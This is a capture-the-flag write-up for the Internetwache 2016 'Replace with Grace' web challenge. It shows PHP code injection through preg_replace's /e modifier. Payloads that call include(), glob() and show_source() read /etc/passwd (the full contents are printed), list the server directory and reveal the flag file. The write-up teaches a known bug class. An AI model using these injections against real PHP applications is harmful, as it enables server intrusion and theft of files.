Title : [writeups] Internetwache CTF 2016 - Replace with Grace #web60
Released : 2016-02-22 02:33:51 -0500
Viewed : 762

https://ctf.internetwache.org/tasks/web/60

Description: Regular expressions are pretty useful. Especially when you need to search and replace complex terms.

Service: https://replace-with-grace.ctf.internetwache.org/

This challenge is about regular expression's vulnerability. First i try to test it's vuln using include()

Pattern	: /^(.*)/e
Replace	: include("\1")
Input	: /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
vnstat:x:108:113::/var/lib/vnstat:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false
web50:x:1000:1000::/home/web50:/bin/false
web60:x:1001:1001::/home/web60:/bin/false
web70:x:1002:1002::/home/web70:/bin/false
web80:x:1003:1003::/home/web80:/bin/false
web90:x:1004:1004::/home/web90:/bin/false
crypto80:x:1005:1005::/home/crypto80:/bin/false
colord:x:110:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:111:119::/var/lib/saned:/bin/false
1

Yarp. it's working.

Now let's list the directory. i use glob() because all "exec" function is disabled.

Pattern	: /^(.*)/e
Replace	: print_r(glob("\1"))
Input	: ./*

Array
(
    [0] => ./ajax.php
    [1] => ./assets
    [2] => ./flag.php
    [3] => ./index.php
)
1

Got the files flag.php. Now let's read it.

Pattern	: /^(.*)/e
Replace	: show_source("\1")
Input	: flag.php

<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br /><br />$FLAG&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"IW{R3Pl4c3_N0t_S4F3}"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code>1

Yarp. Got the flag

Flag: IW{R3Pl4c3_N0t_S4F3}